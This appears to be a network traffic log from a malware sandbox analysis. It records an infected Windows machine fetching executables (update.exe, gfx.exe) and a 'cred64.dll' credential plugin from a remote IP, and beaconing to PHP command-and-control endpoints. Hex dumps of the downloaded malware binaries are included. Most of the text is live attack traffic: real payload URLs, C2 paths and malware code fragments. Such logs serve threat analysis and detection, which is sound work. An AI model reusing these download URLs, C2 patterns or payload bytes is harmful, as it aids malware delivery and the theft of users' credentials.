Dec 13, 2024 01:37:19.177130938 CET	235	OUT	GET /update.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 13, 2024 01:37:20.504733086 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 05:53:20 GMT ETag: "4b400-6290c54e671ba" Accept-Ranges: bytes Content-Length: 308224 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$a\i%=:%=:%=:,EJ:&=:%=:&=:JKr:-=:JKC:$=:JKD:$=:Rich%=:PEd<zZg":*\4@@@h((@P .text9: `.rdataP>@@.datap@.pdata@X@@.rsrc(\@@.x64`T`
Dec 13, 2024 01:37:20.504746914 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 Data Ascii: HT$HL$H8HL$@?HD$(HT$HHL$(?HD$ HD$ H8HT$HL$H8HL$@7`HD$(HT$HHL$(*`HD$ HD$ H8
Dec 13, 2024 01:37:20.504849911 CET	1236	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 48 48 8d 05 75 3f 00 00 48 89 44 24 30 48 8d 05 71 3f 00 00 48 89 44 24 20 48 8d 05 79 3f 00 00 48 89 05 b6 5f 00 00 48 8d 05 6f 3f 00 00 48 89 05 50 5f 00 00 48 8d 05 79 3f 00 00 48 89 05 Data Ascii: HHHu?HD$0Hq?HD$ Hy?H_Ho?HP_Hy?H_H?H\_H%@H>_H?H(_H@HB_HD$(H@H@H__H@H@HM_H@H@H;_H@H@
Dec 13, 2024 01:37:20.504928112 CET	1236	IN	Data Raw: 48 89 05 05 5e 00 00 48 8d 15 e6 41 00 00 48 8d 0d f7 41 00 00 e8 d2 fa ff ff 48 89 05 f3 5d 00 00 48 8d 15 f4 41 00 00 48 8d 0d 05 42 00 00 e8 b8 fa ff ff 48 89 05 e1 5d 00 00 48 8d 15 02 42 00 00 48 8d 0d 0b 42 00 00 e8 9e fa ff ff 48 89 05 cf Data Ascii: H^HAHAH]HAHBH]HBHBH]HBHBH]HBHBjH]HBH%BPH]H"BH+B6H]H(BH1BHu]H.BHGBHc]H
Dec 13, 2024 01:37:20.504937887 CET	1236	IN	Data Raw: 48 8d 0d a9 43 00 00 e8 0c f6 ff ff 48 89 05 ed 57 00 00 48 8d 15 a6 43 00 00 48 8d 0d b7 43 00 00 e8 f2 f5 ff ff 48 89 05 db 57 00 00 48 8d 15 b4 43 00 00 48 8d 0d bd 43 00 00 e8 d8 f5 ff ff 48 89 05 c9 57 00 00 48 8d 15 ba 43 00 00 48 8d 0d c3 Data Ascii: HCHWHCHCHWHCHCHWHCHCH/WHCHCHWHCHCHWHCHCpHVHCHCVHVHCHD<HVHCHD"
Dec 13, 2024 01:37:20.505074978 CET	672	IN	Data Raw: 8b 44 24 48 8b 4c 24 44 2b c8 8b c1 8b 4c 24 48 48 8b 54 24 58 48 03 d1 48 8b ca 4c 8d 4c 24 60 44 8b c0 48 8b d1 48 8b 4c 24 38 ff 15 03 53 00 00 85 c0 74 19 83 7c 24 60 00 76 12 8b 44 24 60 8b 4c 24 48 03 c8 8b c1 89 44 24 48 eb b2 48 8b 84 24 Data Ascii: D$HL$D+L$HHT$XHHLL$`DHHL$8St\|$`vD$`L$HD$HH$L$HHL$8uRHL$PjRHD$XHxDD$T$HL$H(DD$8HT$0HBOSH(DD$T$HL$H(DD$8HT$0HBSH(
Dec 13, 2024 01:37:20.505084991 CET	1236	IN	Data Raw: 00 00 00 00 48 c7 44 24 30 00 00 00 00 c7 44 24 28 04 00 00 00 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 33 d2 48 8d 8c 24 40 01 00 00 ff 15 31 50 00 00 85 c0 75 05 e9 85 07 00 00 48 c7 44 24 30 00 00 00 00 c7 44 24 28 00 00 00 00 c7 44 24 20 03 Data Ascii: HD$0D$(D$ E3E33H$@1PuHD$0D$(D$ E3AH$@NHD$PH\|$Pu>3HL$PlP$$t$uHL$PN$AA03NHD$`H\|$`uHL$PdN
Dec 13, 2024 01:37:20.505099058 CET	1236	IN	Data Raw: 84 24 f0 00 00 00 48 8b 80 b0 00 00 00 48 89 84 24 60 0a 00 00 c7 84 24 58 0a 00 00 00 00 00 00 8b 84 24 64 0a 00 00 39 84 24 58 0a 00 00 0f 83 df 01 00 00 8b 84 24 58 0a 00 00 8b 8c 24 5c 0a 00 00 03 c8 8b c1 8b c0 48 8b 4c 24 60 48 03 c8 48 8b Data Ascii: $HH$`$X$d9$X$X$\HL$`HHH$p$XH$XH$p@H3H$h$X$\HL$`HHH$x$$$$h9$)$XH$
Dec 13, 2024 01:37:20.505110025 CET	1236	IN	Data Raw: e8 1f fe ff ff 8b c0 48 8b 4c 24 38 48 03 c8 48 8b c1 48 89 44 24 48 48 8b 54 24 38 48 8b 44 24 48 8b 48 20 e8 fb fd ff ff 8b c0 48 8b 4c 24 38 48 03 c8 48 8b c1 48 89 44 24 28 48 8b 54 24 38 48 8b 44 24 48 8b 48 1c e8 d7 fd ff ff 8b c0 48 8b 4c Data Ascii: HL$8HHHD$HHT$8HD$HH HL$8HHHD$(HT$8HD$HHHL$8HHHD$PHT$8HD$HH$HL$8HHHD$@HD$H@D$ D$ L$ L$ HT$8HD$(nHL$8HHHD$XHDHL$XEHtMHT$8HD$HH3
Dec 13, 2024 01:37:20.505281925 CET	1236	IN	Data Raw: 43 00 00 48 8b 0d 26 46 00 00 e8 ad 10 00 00 ff 15 bb 42 00 00 4c 8b 84 24 40 02 00 00 33 d2 48 8b c8 ff 15 08 43 00 00 48 c7 84 24 40 02 00 00 00 00 00 00 33 c0 48 81 c4 58 02 00 00 c3 cc cc cc cc cc cc 48 83 ec 48 e8 f7 fd ff ff 85 c0 74 05 c6 Data Ascii: CH&FBL$@3HCH$@3HXHHtD$0D$0uEX@HD$(D$ E3L33BHD$8HL$8B2HHHL$H83D$ D%CLZEH.Ch
Dec 13, 2024 01:37:20.624737978 CET	1236	IN	Data Raw: 8d 15 b6 2f 00 00 48 8d 4c 24 40 e8 08 0a 00 00 85 c0 74 3c 48 8d 0d b9 2f 00 00 e8 88 0e 00 00 0f b6 c0 85 c0 74 08 33 c9 ff 15 95 3c 00 00 e8 4c fd ff ff 33 c0 83 f8 01 74 0d b9 50 c3 00 00 ff 15 2e 3c 00 00 eb ec 33 c9 ff 15 74 3c 00 00 48 8d Data Ascii: /HL$@t<H/t3<L3tP.<3t<H/HL$@tAH/7t3D<3tP;3#<4$P9tTHw:uH4/t3;3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49726	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:21.548691034 CET	232	OUT	GET /gfx.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 13, 2024 01:37:22.874183893 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:22 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 07:53:47 GMT ETag: "6bc00-6290e03a93110" Accept-Ranges: bytes Content-Length: 441344 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 fa 04 00 00 00 02 00 00 00 00 00 aa a6 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PELZg@0@FE88@<.textz `.rdataIJ@@.datam`,H@.rsrct@@.relocEFv@B
Dec 13, 2024 01:37:22.874234915 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 60 Data Ascii: h`DYhDYj hEdnF6hDYj hEtF5h DYjhETuF5hDYj h$EoF5
Dec 13, 2024 01:37:22.874361992 CET	1236	IN	Data Raw: 00 68 e0 d2 44 00 e8 79 93 02 00 59 c3 cc cc cc 6a 14 68 48 d0 45 00 b9 4c 74 46 00 e8 8f 35 02 00 68 40 d3 44 00 e8 59 93 02 00 59 c3 cc cc cc 6a 1c 68 60 d0 45 00 b9 8c 6d 46 00 e8 6f 35 02 00 68 a0 d3 44 00 e8 39 93 02 00 59 c3 cc cc cc 6a 14 Data Ascii: hDyYjhHELtF5h@DYYjh`EmFo5hD9YjhE$uFO5hDYj hEuF/5h`DYjh{EoF5hDYjh{EmF4h DYjhEnF4hDYjh
Dec 13, 2024 01:37:22.874454975 CET	1236	IN	Data Raw: d3 45 00 b9 fc 6c 46 00 e8 cf 30 02 00 68 80 e1 44 00 e8 99 8e 02 00 59 c3 cc cc cc 6a 0c 68 70 d3 45 00 b9 2c 6d 46 00 e8 af 30 02 00 68 e0 e1 44 00 e8 79 8e 02 00 59 c3 cc cc cc 6a 0c 68 80 d3 45 00 b9 c4 6e 46 00 e8 8f 30 02 00 68 40 e2 44 00 Data Ascii: ElF0hDYjhpE,mF0hDyYjhEnF0h@DYYjhExFo0hD9YjhExFO0hDYjhEuF/0h`DYjhEwF0hDYjhEnF/h D
Dec 13, 2024 01:37:22.874473095 CET	1236	IN	Data Raw: 89 02 00 59 c3 cc cc cc 6a 08 68 78 d5 45 00 b9 9c 72 46 00 e8 ef 2b 02 00 68 20 f0 44 00 e8 b9 89 02 00 59 c3 cc cc cc 6a 08 68 84 d5 45 00 b9 bc 76 46 00 e8 cf 2b 02 00 68 80 f0 44 00 e8 99 89 02 00 59 c3 cc cc cc 6a 10 68 90 d5 45 00 b9 34 71 Data Ascii: YjhxErF+h DYjhEvF+hDYjhE4qF+hDyYjhEwF+h@DYYjhEyFo+hD9YjhEluFO+hDYj@hEoF/+h`DYjhElrF
Dec 13, 2024 01:37:22.874588966 CET	1236	IN	Data Raw: e8 2f 27 02 00 68 60 fe 44 00 e8 f9 84 02 00 59 c3 cc cc cc 6a 0c 68 f4 d9 45 00 b9 74 73 46 00 e8 0f 27 02 00 68 c0 fe 44 00 e8 d9 84 02 00 59 c3 cc cc cc 6a 08 68 04 da 45 00 b9 34 6e 46 00 e8 ef 26 02 00 68 20 ff 44 00 e8 b9 84 02 00 59 c3 cc Data Ascii: /'h`DYjhEtsF'hDYjhE4nF&h DYjhErF&hDYj4h(EoF&hDyYjh`EkF&h@EYYjhhE\vFo&hE9YjhEoFO&hEY
Dec 13, 2024 01:37:22.874638081 CET	1236	IN	Data Raw: 65 e3 02 00 83 c9 ff 83 c4 1c 85 c0 0f 48 c1 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 8d 45 10 50 51 ff 75 0c e8 ad ff ff ff 83 c4 0c 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 5d c3 cc cc cc cc cc cc cc cc 55 8b Data Ascii: eH]UMEPQu]UE]U$aF3EUEVUNEQW$EPfM3^9y]UVWFP$EfEPN^]A$EPYI
Dec 13, 2024 01:37:22.874655962 CET	1236	IN	Data Raw: 75 e8 6a 02 e8 f3 2f 02 00 ff 75 e0 8b 06 8d 4d b0 51 8b ce ff 50 08 c6 45 fc 01 8d 55 b0 83 7d c4 10 8b 4d c0 0f 43 55 b0 8b 45 dc 8b 75 d8 2b c6 89 4d e0 51 52 3b c8 77 25 83 7d dc 10 8d 04 0e 89 45 d8 8d 45 c8 0f 43 45 c8 03 f0 56 e8 b9 8b 02 Data Ascii: uj/uMQPEU}MCUEu+MQR;w%}EECEVEEuQM/Ur,MBrI#+RQzMM$E~EfEW}f~fGMCEGEPEEPME
Dec 13, 2024 01:37:22.874671936 CET	1236	IN	Data Raw: c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 56 c7 45 fc 00 00 00 00 e8 46 56 02 00 6a 14 56 e8 7f 76 02 00 83 c4 0c 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 a1 24 61 46 Data Ascii: PEdVEFVjVvMdY^]U$aF3EjEPjhTFEtx}t_d,F;~-hFp=FuhDuhFLpjjhTFhFLFEtMhF3Eo]
Dec 13, 2024 01:37:22.874826908 CET	1000	IN	Data Raw: 58 e1 45 00 74 0b 6a 04 56 e8 bf 71 02 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 71 04 85 f6 74 25 57 83 cf ff 8b c7 f0 0f c1 46 04 75 17 8b 06 8b ce ff 10 f0 0f c1 7e 08 4f 75 09 8b 06 8b ce 5f 5e ff 60 04 5f 5e Data Ascii: XEtjVq^]Vqt%WFu~Ou_^`_^UQMahEFEPyUVWFP$EfEP~E^]VFtAN+rP#+w#QPpFF
Dec 13, 2024 01:37:22.994350910 CET	1236	IN	Data Raw: 00 00 00 c7 46 18 00 00 00 00 8d 46 04 50 e8 a4 4b 02 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 e8 aa bd 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b f1 e8 04 fd 01 00 85 c0 75 08 8d 50 01 e8 c8 14 Data Ascii: FFPKMdY^]UQVuPFPUSM]]VCCCQAU;t-W+KEWsusuV}K_^[]UVWMw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49732	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:24.203330040 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:24.323175907 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:25.665555954 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:24 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49739	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:25.891144991 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:26.011365891 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:27.531460047 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49745	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:27.765964031 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:27.886140108 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:29.394916058 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49751	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:29.498703957 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:37:30.834966898 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49752	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:29.498817921 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:37:30.834928036 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49753	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:29.547888041 CET	66	OUT	GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1 Host: 185.81.68.147
Dec 13, 2024 01:37:30.873532057 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 18:53:38 GMT ETag: "138c00-629173b693080" Accept-Ranges: bytes Content-Length: 1281024 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$DsXRichPEdZg" 8P`~X~ `0lpp8.text `.rdata@@.dataD@.pdata`@@_RDATAt@@.rsrc v@@.relocl0x@B
Dec 13, 2024 01:37:30.873564959 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 07 63 11 00 48 8d Data Ascii: H(A HcHcH,H(+H(A HbH03HlH(H(AHbH HH(H(A Hb
Dec 13, 2024 01:37:30.873615980 CET	1236	IN	Data Raw: 48 8d 0d 70 be 12 00 e8 d3 0b 0c 00 48 8d 0d ec 8c 0f 00 48 83 c4 28 e9 9b e6 0c 00 cc cc cc 48 83 ec 28 41 b8 14 00 00 00 48 8d 15 c7 62 11 00 48 8d 0d 60 c3 12 00 e8 a3 0b 0c 00 48 8d 0d 2c 8d 0f 00 48 83 c4 28 e9 6b e6 0c 00 cc cc cc 48 83 ec Data Ascii: HpHH(H(AHbH`H,H(kH(AHbHPsHlH(;H(AHbHCHH(H(A HbHpHH(H(E3HH
Dec 13, 2024 01:37:30.873665094 CET	1236	IN	Data Raw: b8 28 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d 50 bd 12 00 e8 f3 06 0c 00 48 8d 0d 6c 93 0f 00 48 83 c4 28 e9 bb e1 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d a0 c1 12 00 e8 c3 06 0c 00 48 8d 0d ac 93 0f 00 48 83 c4 Data Ascii: (H`HPHlH(H(AH`HHH(H(AH`HPHH([H(AH`HcH,H(+H(AH_`Hp3HlH(H(A
Dec 13, 2024 01:37:30.873701096 CET	1236	IN	Data Raw: 0b dd 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 e7 5d 11 00 48 8d 0d f0 b4 12 00 e8 13 02 0c 00 48 8d 0d ec 99 0f 00 48 83 c4 28 e9 db dc 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 bf 5d 11 00 48 8d 0d 40 bf 12 00 e8 e3 01 Data Ascii: H(AH]HHH(H(AH]H@H,H(H(AH]HHlH({H(AHo]HHH(KH(AHO]H0SHH(
Dec 13, 2024 01:37:30.873737097 CET	1236	IN	Data Raw: 48 8d 0d 2c a0 0f 00 48 83 c4 28 e9 2b d8 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 7f 5c 11 00 48 8d 0d 50 ba 12 00 e8 33 fd 0b 00 48 8d 0d 6c a0 0f 00 48 83 c4 28 e9 fb d7 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00 00 48 8d 15 87 5c Data Ascii: H,H(+H(A4H\HP3HlH(H(A(H\H HH(H(AH\HHH(H(A4Hg\H`H,H(kH(A(Ho\HPsH
Dec 13, 2024 01:37:30.873773098 CET	1236	IN	Data Raw: 23 aa 12 00 e8 86 f8 0b 00 48 8d 0d 4f a9 0f 00 48 83 c4 28 e9 4e d3 0c 00 cc cc cc cc cc cc 48 8d 0d a9 a9 0f 00 e9 3c d3 0c 00 cc cc cc cc 48 83 ec 28 45 33 c0 48 8d 15 e2 b0 10 00 48 8d 0d e3 ae 12 00 e8 46 f8 0b 00 48 8d 0d ef a9 0f 00 48 83 Data Ascii: #HOH(NH<H(E3HHFHH(HIdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHHHH
Dec 13, 2024 01:37:30.873809099 CET	1236	IN	Data Raw: 00 00 48 c7 80 80 02 00 00 0f 00 00 00 48 89 90 88 02 00 00 48 89 90 98 02 00 00 48 c7 80 a0 02 00 00 0f 00 00 00 48 89 90 a8 02 00 00 48 89 90 b8 02 00 00 48 c7 80 c0 02 00 00 0f 00 00 00 48 89 90 c8 02 00 00 48 89 90 d8 02 00 00 48 c7 80 e0 02 Data Ascii: HHHHHHHHHHH HHkdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHH
Dec 13, 2024 01:37:30.873868942 CET	776	IN	Data Raw: c2 45 85 c0 7f d1 41 ff c8 45 85 c0 78 1e 41 0f b6 01 42 0f b6 8c 30 30 48 11 00 41 0f b6 02 42 0f b6 84 30 30 48 11 00 2b c8 75 04 48 83 c7 07 45 33 db 4c 8b d7 48 85 ff 75 05 45 8b d3 eb 19 44 38 1f 74 0a 66 90 49 ff c2 45 38 1a 75 f8 44 2b d7 Data Ascii: EAExAB00HAB00H+uHE3LHuED8tfIE8uD+A?AHL5@LAILEt+At#AB10HB820HuIIxAB00HAB00H+u.B0<Ft"AHA\|3H\$ Hl$(Ht$
